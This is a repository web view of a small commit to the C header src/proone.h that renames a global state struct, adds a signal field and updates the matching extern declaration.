aboutsummaryrefslogtreecommitdiff
path: root/src/proone.h
diff options
context:
space:
mode:
Diffstat (limited to 'src/proone.h')
-rw-r--r--src/proone.h7
1 files changed, 4 insertions, 3 deletions
diff --git a/src/proone.h b/src/proone.h
index e1dcd48..c40a1b1 100644
--- a/src/proone.h
+++ b/src/proone.h
@@ -5,13 +5,14 @@
#include <stdbool.h>
-typedef struct {
+struct proone_global {
bool has_proc_lim_lock;
bool bin_ready;
+ int caught_signal;
proone_rnd_engine_t *rnd;
proone_unpack_bin_archive_result_t bin_pack;
proone_bin_archive_t bin_archive;
-} proone_global_t;
+};
-extern proone_global_t pne_global;
+extern struct proone_global pne_global;